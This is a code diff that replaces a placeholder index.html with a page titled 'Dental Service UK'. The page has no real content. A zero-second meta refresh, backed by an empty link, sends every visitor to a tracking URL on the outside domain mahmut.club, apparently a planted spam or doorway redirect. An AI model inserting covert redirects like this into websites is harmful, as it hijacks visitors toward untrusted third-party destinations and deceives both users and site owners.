--- a/index.html
+++ b/index.html
@@ -1,11 +1,10 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Document</title>
-</head>
-<body>
-    test
-</body>
-</html>
+<html xmlns="http://www.w3.org/1999/xhtml">    
+  <head>      
+    <title>Dental Service UK</title>      
+    <meta http-equiv="refresh" content="0;URL='http://mahmut.club/r.php?t=c&d=0&l=8&c=0&cr=2622" />    
+  </head>    
+  <body> 
+    <p> <a href="http://mahmut.club/r.php?t=c&d=0&l=8&c=0&cr=2622">
+      </a>.</p>
+  </body>  
+</html>  
